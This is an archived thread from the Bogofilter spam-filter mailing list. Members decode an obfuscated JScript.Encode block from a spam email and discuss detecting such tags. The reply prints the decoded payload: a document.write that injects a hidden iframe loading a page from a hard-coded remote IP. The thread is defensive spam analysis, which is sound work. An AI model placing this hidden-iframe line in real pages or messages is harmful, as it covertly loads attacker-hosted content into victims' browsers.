What's that?
David Relson
relson at osagesoftware.com
Sat Sep 4 00:14:50 CEST 2004
On Fri, 3 Sep 2004 14:11:54 -0400
Bob Vincent wrote:
> Two minutes of googling yields the following:
>
> http://www.klaphek.nl/nr6/scrdec.html
>
> Which led me to
>
> http://www.virtualconspiracy.com/index.php?page=/scrdec/intro
>
> from which I downloaded the following file:
>
> http://www.virtualconspiracy.com/download/scrdec15.c
>
> Which I compiled to produce an executable called "scrdec"
>
> So I saved your attachment, unpacked it, opened it in mutt, and
> saved the text/html portion to a file called "spam-message.html"
>
> I ran the compiled "scrdec" progam as follows:
>
> ./scrdec spam-message.html spam-message.decoded
>
> After decoding, the contents of the <script> tags read as follows:
>
> document.write('<IFRAME SRC="http://201.12.78.176/link.html" WIDTH=440
> HEIGHT=440 FRAMEBORDER=0 SCROLLING="no"
> style="display:none;"></IFRAME>')
>
> ... which references a webserver located in Brasil.
>
> On Fri, Sep 03, 2004 at 12:25:16PM -0400, Matej Cepl wrote:
> > Can anybody comment on the attached piece of spam (of course,
> > correctly caught by bogofilter)? What does that <script> element in
> > the end of the message means?
> >
> > Matej
Matej & Bob,
Thanks for presenting the problem and an answer. Having bogofilter
parse the script tag, i.e. <script language="JScript.Encode">, should be
very easy and might be valuable. Having bogofilter actually decode the
JScript stuff is harder and can wait until there's a pressing need for
it, right?
David
More information about the Bogofilter
mailing list